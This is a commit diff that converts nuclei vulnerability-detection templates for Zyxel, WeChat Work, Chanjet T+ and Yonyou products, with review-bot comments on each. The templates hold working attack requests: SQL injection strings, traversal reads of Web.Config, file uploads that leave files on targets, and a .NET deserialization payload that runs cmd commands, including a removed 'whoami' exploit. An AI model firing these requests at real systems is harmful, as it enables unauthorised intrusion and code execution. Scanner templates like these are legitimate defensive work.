Templates - update

patch-1
pussycat0x 2023-09-15 17:53:57 +05:30
parent 25593b4df3
commit c84e4ef64c
25 changed files with 367 additions and 345 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2022-0342
info:
name: Zyxel - Authentication Bypass
author: SleepingBag945
severity: critical
description: |
An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
metadata:
max-request: 1
fofa-query: app="ZyXEL-USG-FLEX"
verified: true
tags: cve,cve2022,zyxel,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"
matchers-condition: and
matchers:
- type: word
words:
- "interface-name"
- type: word
part: header
words:
- "text/zyxel"
- type: status
status:
- 200
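Review bot: the template has no `reference:` list, and the patch-analysis URL that the deleted copy of this file carried as a trailing comment (security.humanativaspa.it, CVE-2022-0342) is lost with it; add a `reference:` entry under `info` with that URL and a `classification:` block with `cve-id: CVE-2022-0342` so the CVE metadata stays with the template rather than in a comment.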

View File

@ -1,20 +1,24 @@
id: wechat-info-leak
info:
name: wechat-info-leak
name: WeChat agentinfo - Information Exposure
author: SleepingBag945
severity: high
description: |
企业微信信息泄露
There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
metadata:
tags: wechat
max-request: 1
fofa-query: body="wework_admin.normal_layout"
verified: true
tags: wechat,exposure,tencent
http:
- raw:
- |
GET /cgi-bin/gateway/agentinfo HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
matchers:
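Review bot: the hardcoded `User-Agent` (a specific Chrome build) and the `Content-Type: application/x-www-form-urlencoded` header on a body-less GET add nothing to the check; drop both and let nuclei send its defaults, which also keeps this request consistent with the other templates converted in this PR.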
@ -22,4 +26,4 @@ http:
dsl:
- status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid")
- contains(body_1,"corpid")
condition: and
condition: and
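Review bot: the second DSL line `contains(body_1,"corpid")` is implied by the first, since `strcorpid` already contains `corpid`, so under `condition: and` it can never change the result; either remove it or have it check a field the first line does not already cover.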

View File

@ -1,18 +1,24 @@
id: yonyou-chanjet-remote-gnfunction-sqli
id: chanjet-gnremote-sqli
info:
name: 畅捷通远程通 GNRemote.dll SQL注入漏洞
name: Changjietong Remote Communication GNRemote.dll - SQL Injection
author: SleepingBag945
severity: high
description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞攻击者可利用该漏洞获取数据库敏感信息。
tags: yonyou,changjietong
description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: body="远程通CHANJET_Remote"
verified: true
tags: yonyou,chanjet,sqli
http:
- raw:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
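Review bot: `reference: |` turns the value into a literal block string beginning with `- https://...` instead of a YAML list of URLs, which is what every other template in this PR uses and what the template schema expects; change it to `reference:` followed by the list item.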
@ -21,32 +27,25 @@ http:
- |
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "{\"RetCode\":0}"
part: body_1
condition: and
- type: word
part: body_2
words:
- "{\"RetCode\":2}"
part: body_2
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
- 200
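Review bot: `condition: and` under each single-entry `words:` list is a no-op (one word, nothing to combine) and can be dropped; moving `part: body_1` / `part: body_2` above `words:` is fine. Removing the trailing `# http://wiki.peiqi.tech/...` comment is correct now that the PeiQi write-up is listed under `reference:`.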

View File

@ -1,13 +1,17 @@
id: chanjet-tplus-checkmutex-sqli
info:
name: chanjettplus - CheckMutex SQL Injection
name: Chanjet Tplus CheckMutex - SQL Injection
author: unknown
severity: critical
severity: high
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: chanjettplus,sqli
http:
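Review bot: `author: unknown` should not ship; credit either the original template author or the contributor who rewrote it. The severity change from critical to high is not explained anywhere in the diff; for an SQL injection reached with an empty `ASP.NET_SessionId` and `sid=admin` in the cookie, state the reasoning in the PR or keep critical.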
@ -19,8 +23,13 @@ http:
Cookie: ASP.NET_SessionId=; sid=admin
{"accNum": "6'", "functionTag": "SYS0104", "url": ""}
matchers:
- type: word
part: body
words:
- "附近有语法错误"
part: body
- "order by begintime"
- type: status
status:
- 200
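Review bot: with two entries under `words:` and no `condition:`, the word matcher defaults to `or`, so either `附近有语法错误` or `order by begintime` alone satisfies it; if both are needed to confirm the injection, add `condition: and`. Note also that `附近有语法错误` is the Chinese-locale text of SQL Server's syntax error (`Incorrect syntax near` on an English-locale server), so an English install would only ever match on the second word.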

View File

@ -0,0 +1,33 @@
id: chanjet-tplus-file-read
info:
name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,lfi,tplus
http:
- method: GET
path:
- "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xml version"
- "<configuration>"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,43 @@
id: chanjet-tplus-fileupload
info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,upload,intrusive
http:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
Accept-Encoding: gzip
------WebKitFormBoundaryuirnbcvo
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
Content-Type: image/jpeg
{{randstr_2}}
------WebKitFormBoundaryuirnbcvo--
- |
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1==200 && status_code_2==200"
- "contains(body_2, '{{randstr_2}}')"
condition: and
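Review bot: the first request writes `{{randstr_1}}.jpg` into `img/login/` through the `../../../` filename and nothing in the template removes it, so every run leaves a file on the target; the `intrusive` tag is right, but say so in the description so operators who exclude intrusive checks know what this one does.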

View File

@ -1,67 +0,0 @@
id: chanjet-tplus-getstorewarehousebystore_rce
info:
name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
author: SleepingBag945
severity: critical
description: |
用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
metadata:
tags: yonyou,chanjet
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{}
}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "actorId或archivesId不能为空"
- "\"Type\":\"System.ArgumentException\""
condition: and
- type: word
part: body
words:
- "Object reference not set to an instance of an object"
- "System.NullReferenceException"
condition: and
# EXP
# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
# Host:
# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# Connection: close
# Content-Length: 668
# X-Ajaxpro-Method: GetStoreWarehouseByStore
# Accept-Encoding: gzip
# {
# "storeID":{
# "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# "MethodName":"Start",
# "ObjectInstance":{
# "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# "StartInfo":{
# "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# "FileName":"cmd",
# "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
# }
# }
# }
# }

View File

@ -0,0 +1,53 @@
id: chanjet-tplus-rce
info:
name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
author: SleepingBag945
severity: critical
description: |
Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
reference:
- https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: app="畅捷通-TPlus"
verified: true
tags: chanjettplus,rce
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c ping {{interactsh-url}}"
}
}
}
}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "actorId或archivesId不能为空"
- "\"Type\":\"System.ArgumentException\""
- "Object reference not set to an instance of an object"
- "System.NullReferenceException"
condition: or
- type: word
part: interactsh_protocol
words:
- "dns"
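Review bot: `matchers-condition: or` combined with the error-string word matcher means a host is reported as critical RCE whenever the response contains generic .NET exception text such as `Object reference not set to an instance of an object` or `System.NullReferenceException`, even if the `{{interactsh-url}}` DNS callback never arrives; those strings only show that the endpoint deserialized something and threw. Either make `matchers-condition: and` so the interactsh hit is required, or move the error-string check into a separate low-severity detection template. `metadata` is also missing `max-request: 1`, which the other templates in this PR carry.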

View File

@ -1,24 +1,29 @@
id: yonyou-changjietong-tplus-ufida-sqli
id: chanjet-tplus-ufida-sqli
info:
name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞
name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection
author: SleepingBag945
severity: high
description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞攻击者可利用该漏洞获取数据库敏感信息。
tags: yonyou,changjietong
description: |
Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference:
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md
metadata:
max-request: 1
fofa-query: app="畅捷通-TPlus"
verified: true
tags: yonyou,chanjet,sqli
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and
matchers:
- type: word
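Review bot: the new `name` reads `Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection`; `TPluse` is a typo for `TPlus` (the Upload.aspx template's name has the same typo) and the description repeats it. The reference points at `master` rather than a pinned commit, unlike the other MrWQ links in this PR, so its content can silently change.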
@ -31,5 +36,4 @@ http:
- type: status
status:
- 200
- 200

View File

@ -1,20 +1,24 @@
id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
id: grp-u8-uploadfiledata
info:
name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload
name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: 用友U8+ERP客户关系管理软件存在文件上传漏洞攻击者可利用该漏洞获取服务器控制权。
description: |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: yonyou,upload
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata:
max-request: 2
fofa-query: title="用友GRP-U8行政事业内控管理软件"
verified: true
tags: yonyou,fileupload,grp,intrusive
http:
- raw:
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
Host: 60.172.58.9:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: {{Hostname}}
Content-Length: 327
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
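Review bot: the description says `UFIDA U8+ERP customer relationship management software`, but the id, name and `fofa-query` title (`用友GRP-U8行政事业内控管理软件`) all identify GRP-U8, a different product; reword the description to match. The hardcoded `Content-Length: 327` should also go: the body contains `{{randstr_1}}` and nuclei sets the length from the actual body, so a stale fixed value only invites rejected requests. Replacing the literal `Host: 60.172.58.9:8010` with `{{Hostname}}` is the right fix.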
@ -34,18 +38,12 @@ http:
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# 可尝试启动并调用xpcmdshell执行命令
condition: and
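Review bot: dropping the `# 可尝试启动并调用xpcmdshell执行命令` comment (a hint to go on and call xp_cmdshell) is the right call; a detection template should not carry next-step exploitation notes, and the same comment is removed from the NC accept.jsp template further down.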

View File

@ -1,40 +0,0 @@
id: yonyou-changjietong-tplus-file-upload
info:
name: 畅捷通 T+ 任意文件上传漏洞
author: SleepingBag945
severity: critical
description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。
tags: yonyou,changjietong,upload
http:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
Accept-Encoding: gzip
------WebKitFormBoundaryuirnbcvo
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
Content-Type: image/jpeg
{{randstr_2}}
------WebKitFormBoundaryuirnbcvo--
- |
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_2, '{{randstr_2}}')"
condition: and

View File

@ -1,29 +0,0 @@
id: yonyou-changjietong-tplus-downloadproxy-file-read
info:
name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
author: SleepingBag945
severity: medium
description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器上的敏感文件
tags: yonyou,changjietong
http:
- raw:
- |
GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "xml version"
- "<configuration>"
part: body
condition: and
- type: status
status:
- 200

View File

@ -1,34 +1,32 @@
id: yonyou-fe-directory-traversal
info:
name: yonyou-fe-directory-traversal
name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
author: SleepingBag945
severity: medium
description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞通过漏洞攻击者可以获取目录文件等信息导致进一步攻击
description: |
There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: yonyou
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
fofa-query: "FE协作"
verified: true
tags: yonyou,fe,lfi
http:
- raw:
- |
GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C
Accept-Encoding: gzip
- method: GET
path:
- "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
matchers-condition: and
matchers:
- type: word
words:
- "window.location=\"templateOfTaohong_manager.jsp?path=\""
- type: word
words:
- "var next=window.confirm(\"确定删除文件吗?\");"
condition: and
- type: status
status:
- 200
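Review bot: `max-request: 2` in `metadata` no longer matches the http block, which now issues a single GET to `templateOfTaohong_manager.jsp`; set it to 1. Replacing the raw request, with its hardcoded `Cookie: JSESSIONID=...`, by `method: GET` / `path:` is an improvement. The two word matchers carry no `part:`, so they default to the body, which is what is intended here.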

View File

@ -1,20 +1,25 @@
id: yonyou-nc-accept-arbitrary-file-upload
id: yonyou-nc-accept-fileupload
info:
name: yonyou-nc-accept-arbitrary-file-upload
name: YonYou NC Accept Upload - Arbitray File Upload
author: SleepingBag945
severity: critical
description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。
description: |
Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou
- https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd
metadata:
max-request: 2
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive,fileupload
http:
- raw:
- |
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567
Accept-Encoding: gzip
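Review bot: the first `reference` entry (`用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923`) describes a GRP-U8 SQL injection, not the NC `accept.jsp` upload this template checks; replace it or drop it. Also fix `Arbitray` in the name and `UFIDA N C accept.jsp .` in the description (`UFIDA NC accept.jsp.`).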
@ -33,20 +38,13 @@ http:
- |
GET /{{randstr_3}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
condition: and
# 可尝试启动并调用xpcmdshell执行命令
condition: and
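Review bot: the file name and marker are spread across `{{randstr_3}}` (filename) and `{{randstr_2}}` (content) with the relationship only visible in the upload body; declaring them once under `variables:` as `file_name` / `file_content`, the way the FileReceiveServlet template in this PR does, makes the second request and the DSL self-explanatory.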

View File

@ -1,22 +1,26 @@
id: yonyou-nc-baseapp-uploadservlet-deserialization-rce
id: yonyou-nc-baseapp-deserialization
info:
name: Yonyou NC BaseApp UploadServlet Deserialization RCE
name: Yonyou NC BaseApp UploadServlet - Deserialization Detect
author: SleepingBag945
severity: critical
severity: high
description: |
Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands.
tags: rce
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json
metadata:
max-request: 1
fofa-query: app="Yonyou-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,baseapp,deserialization
http:
- raw:
- |
GET /service/~baseapp/UploadServlet HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/service/~baseapp/UploadServlet"
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")'
condition: and
condition: and
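Review bot: the description still describes the full arbitrary-upload and command-execution issue, but the template now only sends a GET to `/service/~baseapp/UploadServlet` and matches `java.io` in a 200 response, i.e. it confirms the servlet is exposed, not that a file can be uploaded; rewrite the description to match the `Deserialization Detect` name and the downgrade to `high`. The `condition: and` under a single DSL expression is redundant.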

View File

@ -1,33 +1,36 @@
id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload
id: yonyou-nc-dispatcher-fileupload
info:
name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload
name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: Yonyou-NC FileReceiveServlet Arbitrary File Upload
tags: yonyou,nc
description: |
Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
reference:
- https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
metadata:
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive
http:
- raw:
- |
POST /ServiceDispatcherServlet HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Content-Type: application/data
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
{{hex_decode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}}
- |
GET /ncupload/n2d19a.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'just_a_test')"
condition: and
condition: and
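Review bot: the upload body is an opaque `hex_decode(...)` blob (elided in this rendering) that fixes both the written path `/ncupload/n2d19a.jsp` and the marker `just_a_test`, so every scan overwrites the same file name and nobody can review what the serialized payload does from the template alone; build it the way the FileReceiveServlet template in this PR does, with the serialized prefix and suffix decoded around `{{file_name}}` and `{{file_content}}` variables, and add a comment naming the serialized class. `metadata` also lacks `max-request: 2`.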

View File

@ -1,33 +0,0 @@
id: yonyou-nc-filereceiveservlet-arbitrary-file-upload
info:
